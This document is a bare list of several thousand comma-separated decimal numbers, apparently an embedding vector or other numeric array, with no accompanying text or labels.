-0.008291134610772133, 0.02801777794957161, 0.010395205579698086, 0.01528384629637003, -0.013211063109338284, -0.020696548745036125, -0.005432257428765297, -0.024967266246676445, -0.019085252657532692, 0.028659166768193245, 0.03670000284910202, -0.0007225411245599389, 0.015354243107140064, 0.0002659420424606651, 0.039641011506319046, -0.01167016290128231, -0.006167509127408266, 0.005131117533892393, -0.020540112629532814, -0.013140666298568249, 0.0034631129819899797, -0.006589887663722038, 0.00633567851036787, -0.013735124841332436, 0.013500470668077469, 0.014439089223742485, -0.0029018970672041178, -0.015276024118065834, -0.018428219482302666, -0.005623892415314913, 0.028236789628863335, -0.0075324177742004395, -0.027235595509409904, 0.013602154329419136, -0.008619651198387146, -0.0036879905965179205, 0.010817584581673145, -0.039891310036182404, -0.024013003334403038, -0.019382482394576073, 0.03075541742146015, -0.01991436630487442, 0.023715773597359657, -0.016582269221544266, -0.005584783386439085, -0.006566422060132027, 0.004399776458740234, 0.016331970691680908, 0.01847515068948269, -0.0015145009383559227, 0.032507505267858505, -0.018803667277097702, 0.02476389892399311, -0.009339259006083012, 0.03838951885700226, 0.0057764179073274136, -0.01891317404806614, 0.005436168517917395, -0.02135358192026615, 0.01620682142674923, 0.025014197453856468, 0.014079284854233265, 0.004368489142507315, -0.030067095533013344, -0.01500226091593504, -0.020837342366576195, 0.010559463873505592, 0.03910912573337555, -0.019272977486252785, -0.017458314076066017, 0.023449832573533058, 0.030802346765995026, -0.009151535108685493, -0.007000533398240805, 0.016973361372947693, 0.004947304259985685, -0.011310359463095665, -0.008236382156610489, 0.008955989964306355, 0.005858547054231167, 0.014313939958810806, -0.011857886798679829, -0.003822917118668556, 0.004751758649945259, 0.04057962819933891, -0.04905848577618599, -0.005005968268960714, -0.035073064267635345, 0.024091221392154694, -0.012460167519748211, -0.01578444242477417, 0.006273103877902031, 0.018694162368774414, -0.0017178683774545789, -0.008674404583871365, -0.0022370419465005398, 0.009026385843753815, 0.0009503517649136484, 0.01636325754225254, 0.013265815563499928, 0.005788150709122419, 0.005592605099081993, 0.0023837012704461813, -0.045585598796606064, 0.023027453571558, -0.01286690216511488, -0.017520887777209282, 0.009996292181313038, 0.0029116743244230747, 0.02531142719089985, -0.009198466315865517, -0.002999669872224331, 0.01750524528324604, -0.021666456013917923, 0.013609975576400757, -0.004751758649945259, 0.008909058757126331, 0.0005504609434865415, -0.022151408717036247, -0.0014529040781781077, -0.005627803038805723, -0.01053599826991558, 0.0005353061715140939, -0.032507505267858505, 0.002458008471876383, -0.028549661859869957, -0.0028080353513360023, -0.00995718315243721, 0.0006677883211523294, -0.005440079607069492, 0.0029488280415534973, -0.012131650932133198, 0.01087233703583479, 0.00890123751014471, -0.0031854382250458, -0.03253879398107529, 0.007798359729349613, 0.0007000533514656126, 0.005948497913777828, -0.001089189201593399, 0.01565147191286087, 0.01919475942850113, 0.0023778348695486784, 0.009112426079809666, 0.02258943021297455, -0.04255072772502899, -0.007548061199486256, 0.021979328244924545, 0.016011275351047516, -0.005154582671821117, 0.005584783386439085, 0.017536532133817673, -0.003619549563154578, -0.001888970728032291, 0.01501008216291666, 0.0069262259639799595, 0.025358356535434723, -0.01750524528324604, 0.002782614203169942, -0.012139473110437393, -0.008369352668523788, 0.01606602966785431, -0.0028901644982397556, -0.0003360940609127283, 0.016285039484500885, 0.007544150575995445, -0.007591081317514181, 0.018459508195519447, 0.002637910656630993, 0.0034474695567041636, 0.029410062357783318, -0.005193691700696945, -0.0004993746406398714, 0.01993001066148281, 0.029363131150603294, -0.023934785276651382, 0.01777118630707264, -0.02291794866323471, 0.03688772767782211, -0.019742285832762718, 0.00994936190545559, -0.004215963650494814, -0.03382157161831856, 0.030098382383584976, -0.034040581434965134, -0.020305458456277847, -0.002078650053590536, -0.00209820456802845, -0.0023387258406728506, 0.002014119876548648, -0.0061166672967374325, 0.013688193634152412, -0.02506112866103649, -0.009745994582772255, 0.009902430698275566, -0.002010209020227194, -0.008783909492194653, 0.00618706364184618, -0.00023049941228237003, 0.04930878430604935, -0.0043254694901406765, -0.030943140387535095, 0.013383142650127411, -0.005174137186259031, 0.005623892415314913, -0.01479107141494751, -0.005025522783398628, -0.007086573634296656, -0.026062320917844772, 0.01875673606991768, -0.009347081184387207, 0.012507098726928234, 0.0020532291382551193, -0.0017951088957488537, -0.035041775554418564, 0.012906011193990707, 0.004082992672920227, 0.01766168139874935, -0.013187597505748272, 0.019022678956389427, 0.02445102483034134, 0.024232015013694763, -0.038201794028282166, 0.018318714573979378, 0.004962948150932789, -0.007657567039132118, -0.008056479506194592, -0.006421718280762434, 0.010645504109561443, 0.004215963650494814, -0.025201920419931412, 0.011067882180213928, 0.0005211291136220098, -0.038764964789152145, -0.02204190380871296, 0.007243010215461254, -0.0011175433173775673, -0.011631053872406483, -0.010919268243014812, -0.0003326720034237951, -0.04649293050169945, -0.00925321877002716, -0.002428676700219512, 0.00013468204997479916, -0.004258983768522739, -0.001996520906686783, -0.024091221392154694, -0.012710466049611568, 0.030082739889621735, 0.01337532140314579, 0.0008159141289070249, 0.01822485215961933, -0.004395865835249424, -0.0075597940012812614, 0.027000941336154938, -0.00982421264052391, 0.010113620199263096, -0.0008457348449155688, -0.02875302918255329, 0.02276151068508625, 0.003068110905587673, -0.002211621031165123, 0.004133834503591061, 0.00017024691624101251, 0.02388785406947136, -0.02046189457178116, 0.008283312432467937, -0.02587459795176983, -0.03253879398107529, 0.0028099906630814075, -0.029769865795969963, 0.0020571399945765734, 0.015995632857084274, 0.001268113381229341, 0.00412992388010025, -0.00232894835062325, 0.007356426678597927, -0.015862662345170975, -0.014415623620152473, -0.0072469208389520645, 0.009933717548847198, 0.01159976702183485, -0.0022741956636309624, 0.005056810099631548, 0.010090154595673084, 0.01031698752194643, 0.00483779888600111, -0.005901567172259092, 0.007016177289187908, -0.0044740838930010796, 0.0028119462076574564, -0.006722858641296625, -0.0040595270693302155, -0.006453005596995354, 0.02861223742365837, -0.02815856970846653, -0.005291464738547802, 0.024967266246676445, 0.0050137899816036224, -0.004740025848150253, -0.0021470910869538784, -0.008134698495268822, 0.011513726785779, -0.01622246578335762, -0.020680906251072884, 0.01059857290238142, 0.0017599106067791581, -0.0015800086548551917, 0.021150214597582817, 0.011490261182188988, -0.005909388884902, 0.03156888484954834, -0.003424003953114152, -0.012467989698052406, -0.010285699740052223, -0.0037896742578595877, -0.010082332417368889, 0.01508830115199089, 0.007571526803076267, -0.02560865506529808, 0.001437260420061648, 0.01109134778380394, 0.04255072772502899, 0.033633846789598465, 0.008471036329865456, -0.022229626774787903, 0.010817584581673145, -0.00333991926163435, 0.01648840680718422, -0.001443126704543829, 0.010543820448219776, -0.00554567389190197, -0.013211063109338284, -0.019132183864712715, 0.0021197146270424128, 0.017442669719457626, -0.006625086069107056, -0.021948041394352913, 0.006640729494392872, -0.021087640896439552, -0.03202255070209503, -0.022839728742837906, 0.024263301864266396, 0.019319908693432808, 0.0038248724304139614, 0.0002669197856448591, -0.02202625945210457, -0.00211384822614491, -0.004876907914876938, 0.016457119956612587, 0.01917911507189274, 0.006492115091532469, 0.014321762137115002, -0.0027865252923220396, -0.008862127549946308, -0.0008706669323146343, 0.01059857290238142, 0.002960560843348503, 0.005827259737998247, 0.0023876121267676353, -0.013046804815530777, -0.0036879905965179205, -0.012577494606375694, -0.02007080428302288, -0.023152602836489677, -0.01637890189886093, -0.014963151887059212, -0.0004551324527710676, 0.021791605278849602, 0.01636325754225254, 0.010966198518872261, 0.002856921637430787, 0.02032110095024109, 0.009832033887505531, 0.00136979715898633, -0.009558270685374737, -0.01864723116159439, 0.00263204425573349, 0.017145439982414246, -0.01835000142455101, 0.013946314342319965, 0.018866242840886116, 0.03429087996482849, -0.01822485215961933, -0.0025010285899043083, 0.0013414430432021618, -0.007274297531694174, -0.018569013103842735, 0.0027043961454182863, 0.008353709243237972, 0.025546081364154816, -0.003850293345749378, -0.00994936190545559, -0.016691774129867554, -0.001650405116379261, -0.015682758763432503, 0.00011384422396076843, -0.008674404583871365, 0.012131650932133198, 0.0067502353340387344, -0.01258531678467989, -0.016895141452550888, 0.0031541509088128805, 0.0427071638405323, 0.0005734375445172191, -0.0029977145604789257, -0.0091828228905797, 0.002109937369823456, 0.012616603635251522, 0.011419864371418953, 0.0013052670983597636, 0.004599233157932758, 0.005373593885451555, 0.00897163338959217, 0.01279650628566742, 0.004450618755072355, 0.004415420349687338, 0.006539045833051205, 0.006730680353939533, -0.005440079607069492, 0.015017904341220856, -0.01709851063787937, 0.0006262348615564406, -0.002860832493752241, -0.004454529378563166, -0.005838992539793253, -0.002536226762458682, -0.029629074037075043, 0.011146101169288158, 0.005979785230010748, -0.02133793942630291, 0.00028500775806605816, -0.0028295451775193214, -0.01031698752194643, 0.004423242062330246, 0.0001598585513420403, -0.002555781276896596, 0.002209665719419718, 0.023011809214949608, 0.0038033626042306423, 0.005584783386439085, -0.03152195364236832, 0.012992051430046558, 0.013688193634152412, 0.006355233024805784, -0.011349468491971493, -0.024138152599334717, 0.0018919039284810424, 0.005224979016929865, -0.003206948284059763, -0.00505289901047945, -0.015893949195742607, -0.003089620964601636, 0.0021314474288374186, 0.013789878226816654, -0.004521015100181103, 0.0011263428023084998, -0.01991436630487442, 0.003957843407988548, -0.03701287508010864, -0.00320108188316226, 0.007845290936529636, 0.02135358192026615, -0.016973361372947693, 0.01792762242257595, -0.02047753892838955, -0.025123702362179756, -0.0010148817673325539, -0.0009821279672905803, -0.0022448638919740915, -0.010567286051809788, -0.007989994250237942, -0.007203901186585426, 0.005197602789849043, 0.004857353400439024, 0.009628666564822197, 0.009902430698275566, 0.013218884356319904, -0.0016249842010438442, 0.011967392638325691, 0.031662747263908386, 0.008979455567896366, 0.003930467180907726, 0.0022448638919740915, 0.0033614293206483126, 0.010887980461120605, 0.003398583037778735, -0.011850065551698208, 0.013539579696953297, -0.011975213885307312, -0.01267135702073574, -0.012851258739829063, 0.01650405116379261, 0.0026672424282878637, 0.02133793942630291, -0.04164339601993561, 0.006844096817076206, -0.0028979862108826637, 0.015033547766506672, 0.01216293778270483, -0.015127410180866718, -0.01964842528104782, -0.0055965157225728035, -0.000690764922183007, 0.013860274106264114, -0.006046270951628685, -0.004364578519016504, -0.0020590955391526222, 0.007215633522719145, 0.013117200694978237, -0.014267008751630783, 0.01822485215961933, 0.0031463291961699724, -0.01708286628127098, -0.013735124841332436, 0.007121772039681673, -0.01301551703363657, 0.026828860864043236, -0.0019623003900051117, 0.010903623886406422, -0.011083526536822319, -0.01606602966785431, -0.012014323845505714, 0.020164664834737778, 0.003294943831861019, 0.008854306302964687, -0.020008228719234467, -0.0033457856625318527, 0.0016963583184406161, 0.014008888974785805, -0.002182289259508252, 0.02219833992421627, 0.012452345341444016, 0.0037036342546343803, 0.019022678956389427, 0.01025441288948059, -0.006539045833051205, -0.0063161239959299564, -0.009566091932356358, -0.000026918078219750896, 0.014986617490649223, 0.019241690635681152, -0.010426493361592293, 0.019163472577929497, 0.004313736688345671, -0.037482187151908875, 0.013797699473798275, 0.0028002134058624506, 0.009558270685374737, 0.0007865822990424931, 0.01706722192466259, -0.01371948141604662, 0.018428219482302666, 0.039328135550022125, 0.013062448240816593, -0.011724916286766529, -0.0036860350519418716, 0.0036782133392989635, 0.0062300837598741055, 0.01761475019156933, 0.014063641428947449, -0.007974350824952126, 0.004458440467715263, -0.007399446796625853, 0.02077476680278778, 0.0027004850562661886, -0.004912106320261955, 0.020524470135569572, 0.011529370211064816, -0.006683749612420797, -0.002319171093404293, 0.01110699214041233, -0.0019896768499165773, -0.017865048721432686, 0.0058037941344082355, 0.025921529158949852, 0.010285699740052223, 0.010489067994058132, 0.011271250434219837, 0.017739899456501007, -0.0008071145857684314, 0.0015096123097464442, 0.0007606724975630641, -0.007344693876802921, 0.007915686815977097, 0.012272443622350693, 0.03113086335361004, 0.007970440201461315, -0.008674404583871365, 0.008596185594797134, -0.02629697695374489, 0.018381288275122643, 0.002231175545603037, -0.009706884622573853, 0.0006892983219586313, -0.007407268509268761, -0.008424106054008007, -0.019163472577929497, 0.001202605664730072, 0.014063641428947449, -0.0019222135888412595, 0.010176194831728935, -0.007235188502818346, -0.0025244939606636763, 0.0070396424271166325, 0.0005001079407520592, -0.0016298728296533227, 0.01692643016576767, -0.00728994095697999, -0.003398583037778735, -0.010903623886406422, -0.004431063774973154, -0.001980877248570323, -0.02773619256913662, -0.0075402394868433475, 0.0038346496876329184, 0.006910582538694143, -0.010176194831728935, 0.002954694442451, 0.007031820714473724, 0.02631261944770813, 0.018522081896662712, 0.006249638274312019, 0.014274830929934978, 0.023293394595384598, -0.008447570726275444, 0.009910252876579762, -0.00021620013285428286, 0.00020666728960350156, -0.01764603704214096, 0.015979988500475883, -0.0004460884665604681, -0.020962491631507874, 0.01365690678358078, 0.01117738801985979, -0.0082598477602005, 0.008353709243237972, 0.010880159214138985, -0.023512406274676323, 0.009049851447343826, 0.0016171623719856143, -0.01365690678358078, -0.02191675454378128, -0.007829646579921246, -0.012381949461996555, -0.0023524139542132616, 0.002858877182006836, -0.007661477662622929, 0.014470377005636692, 0.023230820894241333, 0.02517063356935978, -0.011896995827555656, -0.00002610839692351874, -0.008306778036057949, 0.004200320225208998, -0.02947263792157173, 0.01761475019156933, 0.013500470668077469, 0.007946974597871304, -0.0017706656362861395, -0.011294715106487274, -0.0021744673140347004, 0.0007699609268456697, 0.022010616958141327, -0.033352263271808624, 0.0316314622759819, -0.005647357553243637, 0.020852986723184586, -0.00015386997256428003, -0.00098506105132401, -0.0008965767337940633, 0.009620845317840576, 0.013477005064487457, 0.0035960841923952103, -0.012264621444046497, 0.012632247991859913, 0.002094293711706996, -0.021384870633482933, 0.030630268156528473, 0.0067580570466816425, -0.02959778718650341, 0.013367499224841595, -0.006300480104982853, 0.0038307388313114643, 0.017411382868885994, -0.007176524493843317, -0.0068988497368991375, 0.003087665420025587, -0.010223125107586384, -0.011529370211064816, -0.00029111854382790625, 0.008940346539020538, 0.00160054094158113, -0.018741093575954437, 0.012913833372294903, -0.009104604832828045, 0.015401173382997513, -0.004939482547342777, 0.0001598585513420403, 0.009472230449318886, -0.005752952303737402, 0.0007934264140203595, 0.014165325090289116, -0.017974553629755974, -0.01891317404806614, 0.007348604965955019, 0.01606602966785431, 0.0012573583517223597, -0.0013463316718116403, -0.011333825066685677, -0.004384133033454418, -0.01152154803276062, -0.007657567039132118, -0.00287843169644475, -0.02405993454158306, 0.0033281866926699877, 0.009409655816853046, -0.015268202871084213, 0.006480382289737463, -0.012577494606375694, -0.007117860950529575, 0.008189450949430466, -0.0014744140207767487, 0.020164664834737778, -0.006460827775299549, 0.016550982370972633, 0.007160881068557501, -0.005807705223560333, -0.012116007506847382, 0.00551047595217824, -0.02942570671439171, 0.004888640716671944, -0.00017036912322510034, -0.0003700701054185629, -0.04067349061369896, 0.012921655550599098, 0.0038894026074558496, -0.005228890106081963, 0.006507758516818285, -0.017974553629755974, 0.016613556072115898, -0.009354903362691402, 0.005416614003479481, -0.006308301817625761, -0.00014812580775469542, -0.03241364285349846, 0.0025108058471232653, -0.008197273127734661, 0.00398130901157856, -0.006773700471967459, -0.005616070702672005, -0.0016367168864235282, -0.01780247502028942, -0.009699063375592232, 0.002763059688732028, -0.0011341646313667297, 0.00039622432086616755, 0.0005768596311099827, -0.014227899722754955, -0.0022253093775361776, -0.023715773597359657, -0.00945658702403307, 0.016613556072115898, -0.02402864769101143, -0.009761638008058071, 0.010848871432244778, 0.010567286051809788, -0.009855499491095543, -0.002778703346848488, -0.005850725341588259, -0.02235477603971958, -0.021416157484054565, 0.003222591942176223, -0.00933143775910139, 0.0006213462329469621, -0.022792799398303032, -0.0015839196275919676, -0.01736445166170597, 0.018631586804986, 0.018834954127669334, -0.0035726185888051987, -0.027376387268304825, -0.001710046548396349, -0.006065825466066599, -0.006789344362914562, -0.0037231887690722942, -0.008361531421542168, -0.013289281167089939, -0.008924702182412148, -0.02135358192026615, -0.009800747036933899, -0.010895802639424801, -0.006937958765774965, -0.016895141452550888, -0.011067882180213928, -0.001936879474669695, -0.028221145272254944, 0.016519695520401, 0.015510679222643375, -0.006011072546243668, -0.016723062843084335, 0.02019595168530941, 0.0064373621717095375, -0.01719237118959427, -0.02318388968706131, 0.018459508195519447, -0.012663534842431545, -0.0048729972913861275, -0.01444691140204668, -0.006179241929203272, -0.0181935653090477, 0.02191675454378128, 0.01719237118959427, -0.008674404583871365, 0.014908398501574993, 0.02005515992641449, 0.019742285832762718, 0.011896995827555656, -0.01808406040072441, -0.007196079008281231, 0.0028999417554587126, -0.0033692512661218643, 0.013844630680978298, 0.007673210464417934, 0.0031267746817320585, -0.018115347251296043, -0.00804865825921297, -0.011349468491971493, 0.002321126637980342, 0.006034538149833679, -0.006363054737448692, 0.014188790693879128, 0.028706097975373268, 0.017724255099892616, 0.009800747036933899, -0.00209820456802845, -0.0047869570553302765, 0.003644970478489995, 0.01485364604741335, 0.0023876121267676353, 0.005092008039355278, 0.004403687547892332, -0.010786296799778938, -0.01252274215221405, 0.003547197673469782, 0.007055286318063736, -0.02050882577896118, -0.005866368766874075, 0.006887116935104132, 0.009691241197288036, 0.01231155265122652, 0.013609975576400757, -0.006472560111433268, 0.004783045966178179, 0.010152729228138924, 0.01066114753484726, -0.01905396580696106, 0.00526408851146698, -0.009049851447343826, 0.0013864184729754925, 0.01109134778380394, -0.01436869241297245, 0.0018469284987077117, -0.01051253266632557, 0.000999238109216094, 0.011200853623449802, 0.00547918863594532, 0.005780328996479511, 0.009276684373617172, -0.012288087047636509, -0.036480993032455444, -0.007727963384240866, -0.00939401239156723, -0.0005846814601682127, 0.004036061931401491, -0.003959799185395241, 0.010974020697176456, -0.03156888484954834, -0.016707418486475945, -0.002534271450713277, 0.004458440467715263, -0.0018322624964639544, -0.0018439952982589602, -0.007481575943529606, -0.02531142719089985, -0.00021644456137437373, -0.0013052670983597636, 0.018850598484277725, 0.008361531421542168, 0.004564035218209028, 0.00422769645228982, -0.016535338014364243, 0.004243340343236923, 0.0035863069351762533, 0.00004418109165271744, 0.0011850064620375633, 0.0010266145691275597, 0.022167053073644638, -0.028361938893795013, -0.00005683044946636073, -0.01750524528324604, -0.005885923281311989, 0.007575437892228365, -0.020555756986141205, -0.0016015187138691545, -0.002653554081916809, 0.02163516916334629, 0.005835081450641155, -0.00933143775910139, -0.010191838257014751, 0.007348604965955019, -0.008416283875703812, 0.025499150156974792, 0.006875384133309126, -0.0048729972913861275, -0.0030172690749168396, -0.0008911992190405726, -0.0001872349384939298, -0.00261640059761703, 0.0030583336483687162, -0.02757975645363331, 0.012773040682077408, 0.0030446455348283052, 0.0009713729377835989, -0.014415623620152473, 0.0058233486488461494, -0.006930137053132057, -0.019664067775011063, -0.009175000712275505, 0.00332427560351789, 0.0010007047094404697, -0.01750524528324604, 0.00576077401638031, 0.005146760959178209, -0.0007328072679229081, 0.00597196351736784, -0.019976941868662834, -0.01145115215331316, 0.0019574116449803114, -0.018381288275122643, 0.012812149710953236, -0.00594067620113492, -0.007211722899228334, -0.016519695520401, -0.006539045833051205, -0.021556951105594635, -0.005659090355038643, 0.009910252876579762, 0.00909678265452385, 0.002788480604067445, 0.0006379676051437855, -0.022964878007769585, 0.014861468225717545, -0.02601538971066475, 0.013390964828431606, 0.04123666137456894, -0.0037075451109558344, 0.01102095190435648, 0.009550448507070541, -0.002778703346848488, -0.00707484083250165, 0.014423445798456669, -0.029910659417510033, -0.0027063514571636915, 0.013570866547524929, -0.008557076565921307, 0.017035935074090958, 0.00010437247692607343, 0.00615577632561326, 0.018162278458476067, -0.00795870739966631, -0.024810830131173134, 0.010622038505971432, 0.003236280055716634, -0.0011341646313667297, 0.01515869703143835, 0.002630088711157441, 0.017833761870861053, -0.02232348918914795, -0.0015125453937798738, 0.009088960476219654, -0.012749575078487396, 0.005690377671271563, -0.008228559978306293, -0.016738705337047577, -0.010144907049834728, -0.016394546255469322, 0.00832242239266634, 0.018709806725382805, 0.0181935653090477, -0.012381949461996555, -0.002964471699669957, 0.0031169974245131016, -0.013672550208866596, -0.006453005596995354, -0.005706021562218666, 0.012569673359394073, -0.008932524360716343, -0.009652132168412209, -0.007243010215461254, 0.01866287551820278, -0.003388805780559778, 0.026531631126999855, -0.004775224253535271, -0.0005318840849213302, 0.00026985295698978007, 0.008220737800002098, 0.008713513612747192, -0.013031160458922386, 0.02047753892838955, 0.0008325355011038482, -0.0318191833794117, 0.011693628504872322, -0.02928491309285164, 0.0002972293586935848, 0.037638623267412186, -0.018021484836935997, 0.000740629096981138, -0.00682845339179039, -0.004305914975702763, 0.02872174233198166, 0.02717301994562149, 0.018834954127669334, -0.008478858508169651, -0.019679712131619453, 0.010856693610548973, 0.001421616761945188, 0.01922604627907276, -0.001656271517276764, 0.004564035218209028, 0.013093735091388226, -0.01001975778490305, 0.0032382356002926826, 0.01536988653242588, 0.0010256367968395352, -0.0132267065346241, 0.008830840699374676, -0.00817380752414465, 0.0004086903645657003, -0.010629860684275627, -0.019413769245147705, 0.017739899456501007, -0.0013512203004211187, -0.004916016943752766, -0.003993041813373566, 0.0044740838930010796, 0.03544851019978523, -0.028690455481410027, 0.016597913578152657, 0.006937958765774965, -0.0018322624964639544, 0.0014108617324382067, -0.0021353582851588726, -0.01922604627907276, -0.004489727783948183, -0.006973157171159983, -0.001648449688218534, -0.02190111018717289, -0.005729487165808678, -0.03158453106880188, -0.0014920131070539355, -0.00615577632561326, 0.004595322068780661, -0.0010755009716376662, -0.0036586588248610497, -0.020086446776986122, 0.0031111310236155987, 0.00890123751014471, -0.02233913354575634, 0.010778475552797318, -0.0010148817673325539, -0.027626685798168182, -0.007493308745324612, 0.012757397256791592, -0.006851918995380402, -0.01236630603671074, 0.03158453106880188, -0.01664484478533268, -0.007047464605420828, -0.006511669605970383, -0.01110699214041233, 0.005381415598094463, -0.011576301418244839, 0.0021412246860563755, 0.0034904894419014454, 0.006726769730448723, -0.016128603368997574, -0.000016285284800687805, 0.008791731670498848, -0.0066993930377066135, -0.004736115224659443, 0.006605531554669142, 0.01331274677067995, -0.0016758260317146778, -0.017818117514252663, 0.0025108058471232653, 0.00020202307496219873, -0.020978135988116264, 0.00682845339179039, 0.0011292760027572513, -0.006652462296187878, 0.01636325754225254, -0.005878101568669081, -0.029206695035099983, 0.002111892681568861, -0.014024532400071621, -0.009472230449318886, -0.012577494606375694, -0.006468649487942457, 0.004861264489591122, -0.0006262348615564406, 0.024810830131173134, 0.011279071681201458, -0.02218269556760788, -0.002546004019677639, -0.005095919128507376, 0.029222339391708374, -0.018819311633706093, -0.009503517299890518, -0.013320568017661572, 0.025952816009521484, -0.011920461431145668, -0.005260177422314882, -0.0035041777882725, 0.0010207481682300568, 0.0033496965188533068, 0.007508952170610428, 0.0037994515150785446, -0.0035726185888051987, 0.013742947019636631, 0.01166234165430069, 0.009628666564822197, -0.014173147268593311, -0.0061166672967374325, 0.01963278092443943, 0.0035804405342787504, 0.017301877960562706, 0.0041533890180289745, -0.0057685961946845055, 0.002729817060753703, -0.012467989698052406, -0.004427153151482344, -0.0068714735098183155, -0.002651598770171404, -0.014845823869109154, -0.006097112782299519, 0.023246465250849724, 0.023246465250849724, -0.0038209615740925074, -0.009057673625648022, 0.002526449505239725, -0.0013414430432021618, 0.011631053872406483, 0.00416512181982398, 0.02576509304344654, 0.018021484836935997, 0.004548391327261925, 0.008674404583871365, -0.007325139362365007, -0.008338065817952156, 0.009581736288964748, -0.006945780944079161, 0.016989003866910934, 0.02063397504389286, 0.0004218897083774209, -0.011130456812679768, -0.004536658525466919, 0.0034494248684495687, -0.0032186810858547688, 0.012499276548624039, -0.018303070217370987, 0.002430632244795561, -0.0011977170361205935, 0.02005515992641449, 0.013977601192891598, -0.011067882180213928, -0.00838499702513218, 0.010418671183288097, 0.0074190013110637665, 0.007121772039681673, -0.010739365592598915, -0.01508830115199089, 0.0002566536422818899, -0.01680128090083599, 0.009261040948331356, 0.0003241168742533773, -0.007352515589445829, -0.0105907516553998, -0.0052210683934390545, 0.019523276016116142, 0.009221931919455528, 0.004431063774973154, 0.010090154595673084, 0.0046461643651127815, 0.01922604627907276, 0.004970769863575697, -0.010504711419343948, -0.0008384019020013511, 0.022135764360427856, 0.006879295222461224, 0.007329049985855818, -0.009683419950306416, -0.015205628238618374, -0.005706021562218666, 0.0019994541071355343, -0.0001592474727658555, -0.0033653401769697666, 0.020665261894464493, 0.01515087578445673, 0.03741961345076561, 0.0018547503277659416, 0.008447570726275444, -0.024920335039496422, 0.010293521918356419, 0.006754145957529545, -0.011623232625424862, -0.0012847348116338253, -0.010778475552797318, 0.0058898343704640865, 0.007919598370790482, 0.009284506551921368, -0.02190111018717289, 0.000529439770616591, 0.004783045966178179, 0.008400640450417995, -0.009918074123561382, -0.012045610696077347, -0.003203037427738309, 0.00136979715898633, 0.02944134920835495, -0.00013089335698168725, -0.013336212374269962, -0.021729029715061188, -0.020649617537856102, 0.0025988013949245214, 0.003515910357236862, -0.002546004019677639, -0.011889174580574036, 0.017239302396774292, -0.0003246057312935591, 0.025577368214726448, -0.023981716483831406, 0.021697742864489555, 0.016723062843084335, -0.031678393483161926, -0.028111640363931656, -0.03632455691695213, 0.011482439003884792, 0.022933591157197952, -0.005968052428215742, 0.010473423637449741, -0.0071921683847904205, 0.02146308869123459, -0.0019202580442652106, 0.0035393759608268738, 0.009120248258113861, 0.01950763165950775, 0.003402493894100189, 0.009339259006083012, 0.003670391393825412, -0.026954010128974915, 0.0035530640743672848, -0.02817421406507492, -0.004364578519016504, -0.010090154595673084, 0.01444691140204668, -0.002606623340398073, 0.014071463607251644, -0.0181935653090477, -0.0025538259651511908, -0.009628666564822197, -0.029097190126776695, -0.014697209931910038, 0.003764253342524171, -0.008439749479293823, -0.017755543813109398, -0.0037955406587570906, -0.0029136298689991236, 0.014306118711829185, 0.010543820448219776, -0.0017178683774545789, 0.006269192788749933, 0.017442669719457626, -0.025014197453856468, -0.0021353582851588726, 0.01117738801985979, 0.005224979016929865, 0.006101023405790329, 0.003498311387374997, -0.007548061199486256, -0.005404881201684475, -0.017677325755357742, 0.014353048987686634, 0.004865175113081932, 0.004962948150932789, 0.00021265586838126183, 0.015205628238618374, -0.02900332771241665, 0.0013385098427534103, 0.027423318475484848, -0.010160550475120544, 0.0041181910783052444, 0.01387591753154993, -0.007974350824952126, -0.027063515037298203, 0.021447444334626198, 0.013985423371195793, 0.014650278724730015, 0.00854143314063549, -0.028502730652689934, 0.014423445798456669, 0.002416943898424506, 0.0034650685265660286, -0.006359143648296595, -0.009018564596772194, 0.042206570506095886, 0.015143053606152534, 0.004172943532466888, -0.017708612605929375, -0.004454529378563166, -0.025843311101198196, 0.021541306748986244, -0.015674937516450882, 0.00958955753594637, 0.0068988497368991375, 0.009221931919455528, 0.010715900920331478, 0.003601950593292713, -0.011075704358518124, 0.006124489009380341, -0.009448764845728874, -0.009745994582772255, 0.005303197540342808, 0.005166315473616123, 0.0105907516553998, 0.007618457544595003, -0.009722528979182243, -0.0074737537652254105, -0.010801940225064754, -0.00042848935117945075, 0.026547275483608246, 0.012780861929059029, 0.004298092797398567, -0.017239302396774292, -0.013664728961884975, -0.010090154595673084, 0.0030348682776093483, -0.00021583348279818892, -0.020414963364601135, -0.020821698009967804, -0.007997816428542137, 0.007102217059582472, 0.01316413190215826, 0.008291134610772133, -0.014736318960785866, -0.0007865822990424931, 0.010090154595673084, 0.0014577927067875862, -0.01316413190215826, -0.017599105834960938, 0.011975213885307312, 0.0006858762935735285, -0.0021451355423778296, -0.010489067994058132, 0.019523276016116142, -0.020086446776986122, -0.01936683990061283, -0.002291794866323471, -0.017958911135792732, 0.015291668474674225, -0.01777118630707264, 0.0009870165959000587, 0.006022805348038673, -0.0013746857875958085, 0.04201884567737579, 0.012679178267717361, 0.016707418486475945, 0.004618787672370672, 0.0003148284740746021, 0.007375981193035841, 0.03360256180167198, -0.00395002169534564, 0.005443990230560303, 0.006824542302638292, -0.01778683066368103, -0.01087233703583479, -0.002512761391699314, 0.013922848738729954, 0.001051057712174952, 0.008924702182412148, -0.0037857634015381336, -0.017833761870861053, -0.005346217658370733, -0.0007777827559038997, -0.0013844630448147655, -0.00149299087934196, 0.008744800463318825, -0.0014538817340508103, 0.0005895700887776911, 0.01222551241517067, 0.018741093575954437, -0.0056551797315478325, 0.00576077401638031, -0.016754349693655968, -0.005897656083106995, -0.01521345041692257, -0.011060060933232307, -0.0008618673891760409, 0.001433349447324872, -0.004974680952727795, 0.011263428255915642, -0.009292328730225563, 0.011951749213039875, -0.003079843707382679, 0.005385326687246561, -0.0000452199274150189, 0.01664484478533268, 0.011122635565698147, -0.0035530640743672848, -0.009503517299890518, 0.015057013370096684, 0.002778703346848488, -0.009417477063834667, -0.001329710241407156, -0.014611169695854187, 0.015557610429823399, -0.0021646900568157434, -0.023246465250849724, -0.018881885334849358, -0.00261640059761703, 0.001956433989107609, -0.017692968249320984, -0.008189450949430466, 0.01216293778270483, -0.010622038505971432, 0.0016953806625679135, 0.007614546921104193, -0.02731381356716156, 0.0047009168192744255, 0.011482439003884792, 0.016253752633929253, -0.00838499702513218, 0.025499150156974792, 0.022401707246899605, -0.0074463775381445885, 0.008283312432467937, 0.0021158037707209587, 0.018396932631731033, -0.012178582139313221, -0.0017090687761083245, -0.010403027758002281, -0.003085710108280182, -0.024967266246676445, -0.010974020697176456, -0.005752952303737402, 0.0023582803551107645, -0.013406608253717422, 0.014626813121140003, -0.0025890241377055645, -0.007102217059582472, 0.011951749213039875, -0.01946070045232773, 0.015338598750531673, -0.00419249851256609, 0.018115347251296043, 0.020149022340774536, 0.03075541742146015, -0.008306778036057949, -0.015377708710730076, 0.01286690216511488, 0.008228559978306293, 0.0035100439563393593, 